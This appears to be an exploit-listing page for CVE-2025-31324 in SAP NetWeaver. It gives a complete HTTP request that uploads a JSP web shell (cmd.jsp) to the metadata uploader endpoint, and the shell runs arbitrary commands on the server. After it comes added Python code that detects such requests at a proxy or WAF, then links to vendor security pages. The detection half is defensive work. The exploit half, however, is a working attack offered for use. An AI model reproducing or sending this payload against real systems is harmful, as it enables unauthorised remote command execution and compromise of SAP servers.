## https://sploitus.com/exploit?id=88813D80-9802-5DEA-9107-2FF5FF6EB264
# CVE-2025-31324
CVE-2025-31324, SAP Exploit
```
POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 636
Content-Type: multipart/form-data; boundary=11111111111111111111111111
--11111111111111111111111111
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while (disr != null) {
out.println(disr);
disr = dis.readLine();
}
}
%>
--11111111111111111111111111--
```
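For detection, the request above has three observable traits: a POST to `/developmentserver/metadatauploader`, a multipart file part named `*.jsp`, and JSP scriptlet content in that part. The following added example (not part of the original repository) checks a raw request captured at a proxy or WAF for those traits; the function names, finding labels, extension and marker lists, and sample requests are assumptions constructed for illustration.

```python
from email import message_from_bytes
from urllib.parse import urlsplit

UPLOADER_PATH = "/developmentserver/metadatauploader"  # path from the request on this page
SCRIPT_EXTS = (".jsp", ".jspx")             # assumption: extensions treated as executable
EXEC_MARKERS = (b"Runtime.getRuntime", b"ProcessBuilder")  # assumption: illustrative list


def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request (non-chunked body)."""
    request_line, _, rest = raw.partition(b"\r\n")
    fields = request_line.decode("latin-1").split(" ")
    if len(fields) != 3:
        return []
    method, target, _version = fields
    if method != "POST" or urlsplit(target).path.lower() != UPLOADER_PATH:
        return []
    findings = ["uploader-endpoint"]
    # HTTP headers and multipart bodies use MIME syntax, so the email
    # parser can split the request into its parts.
    for part in message_from_bytes(rest).walk():
        name = part.get_filename()
        if not name:
            continue  # the multipart container itself, or a plain form field
        data = part.get_payload(decode=True) or b""
        if name.lower().endswith(SCRIPT_EXTS):
            findings.append(f"script-extension:{name}")
        if b"<%" in data:
            findings.append("jsp-scriptlet")
        if any(marker in data for marker in EXEC_MARKERS):
            findings.append("process-exec")
    return findings


def build_sample(path: str, filename: str, content: bytes) -> bytes:
    """Constructed test input: a multipart POST carrying one file part."""
    boundary = "constructedboundary"
    body = (f"--{boundary}\r\nContent-Disposition: form-data; "
            f'name="file"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode()
    body += content + f"\r\n--{boundary}--\r\n".encode()
    head = (f"POST {path} HTTP/1.1\r\nHost: sap.example\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body
```

An empty list means the request did not target the uploader path; a lone `uploader-endpoint` finding still marks a request to review.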
[CVE-2025-31324](https://redrays.io/blog/critical-sap-netweaver-vulnerability-cve-2025-31324-fixed-actively-exploited-in-the-wild/)
[SAP Penetration Testing](https://redrays.io/sap-penetration-testing/)
[SAP ABAP Code Scanner](https://redrays.io/abap-scanner/)